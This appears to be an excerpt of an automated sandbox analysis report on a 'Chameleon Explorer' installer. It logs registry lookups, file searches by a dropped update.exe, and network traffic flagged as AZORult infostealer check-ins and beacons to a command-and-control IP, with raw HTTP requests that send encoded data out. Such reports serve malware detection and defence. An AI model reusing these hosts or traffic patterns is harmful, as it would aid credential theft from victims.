                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_0355A504 FindFirstFileW,FindClose,2_2_0355A504
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_03559F38 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,2_2_03559F38
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeCode function: 16_2_0295A504 FindFirstFileW,16_2_0295A504
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeCode function: 17_2_029DA504 FindFirstFileW,17_2_029DA504
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeCode function: 18_2_029AA504 FindFirstFileW,18_2_029AA504
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeCode function: 19_2_02A7A504 FindFirstFileW,19_2_02A7A504
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeCode function: 20_2_03330280 FindFirstFileW,FindClose,20_2_03330280
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_004099C0 FreeLibrary,FindFirstFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,RemoveDirectoryW,21_2_004099C0
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_00413030 FindFirstFileW,FindNextFileW,FindClose,21_2_00413030
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,21_2_004119A8
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_004119AC FindFirstFileW,FindNextFileW,FindClose,21_2_004119AC
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,21_2_00412D6C
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_0041160C FindFirstFileW,FindNextFileW,FindClose,21_2_0041160C
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,21_2_00413F58
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,21_2_00413F58
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeCode function: 22_2_02A1A504 FindFirstFileW,22_2_02A1A504
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.iniJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2029465 - Severity 1 - ET MALWARE Win32/AZORult V3.2 Client Checkin M15 : 192.168.2.4:49854 -> 92.63.192.63:80
                    Source: Network trafficSuricata IDS: 2810276 - Severity 1 - ETPRO MALWARE AZORult CnC Beacon M1 : 192.168.2.4:49854 -> 92.63.192.63:80
                    Source: Joe Sandbox ViewIP Address: 104.21.79.229 104.21.79.229
                    Source: Joe Sandbox ViewASN Name: ITDELUXE-ASRU ITDELUXE-ASRU
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.79.229:443
                    Source: global trafficHTTP traffic detected: GET /1dHC37 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 2no.co
                    Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 92.63.192.63Content-Length: 107Cache-Control: no-cacheData Raw: 4a 4c 89 28 39 ff 4c 2f fb 39 2f fb 39 4f ed 3f 4e ed 3e 3c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 f0 4c 4e ed 3e 32 ed 3e 3c ed 3e 3d ed 3e 32 ed 3f 4e 8e 28 39 f1 4c 2f fb 3a 2f fb 3a 2f fb 39 2f fb 35 48 ed 3f 4e ed 3e 33 ed 3e 3f ed 3e 3e ed 3e 39 ed 3e 38 8a 4f 2f fb 3a 4b Data Ascii: JL(9L/9/9O?N><>3>>>;>>>3>:>=?N(9LN>2><>=>2?N(9L/:/:/9/5H?N>3>?>>>9>8O/:K
                    Source: global trafficHTTP traffic detected: GET /index.html HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 92.63.192.63Cache-Control: no-cacheConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 92.63.192.63Content-Length: 6077Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /index.html HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 92.63.192.63Cache-Control: no-cacheConnection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownTCP traffic detected without corresponding DNS query: 92.63.192.63
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_00417DA4 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,21_2_00417DA4
                    Source: global trafficHTTP traffic detected: GET /1dHC37 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 2no.co
                    Source: global trafficHTTP traffic detected: GET /activation/4/?h_id=75254DF3C66AB052045780D3C643713C-1B3D82FF206F2697DB14BB5EE90B3A8D-DEE4D6E40AA7315F07804DDD9503F87B-E102E85C5423062DBFF8920ECFD0E53F-453A430160CEF13230B9413C30A336AE-BDBEC76D9EE81A8CBE827F8B10FCC2A4&vrs=3.0.0.505&prg=explorer&uid=5153dce68ee7dc529e3ee1aac6d1b34a HTTP/1.1User-Agent: Chameleon Checker NextGen2 (Ver: 3.0.0.505)Host: neosoft-activator.appspot.comConnection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /static/?category=install&action=install&label=paid&uid=&prg=explorer HTTP/1.1User-Agent: Chameleon Static (Ver: 3.0.0.505)Host: www.chameleon-managers.comConnection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /info/versions/ HTTP/1.1User-Agent: Chameleon checker ( Ver: 3.0.0.505)Host: www.chameleon-managers.comConnection: Keep-AliveCache-Control: no-cache
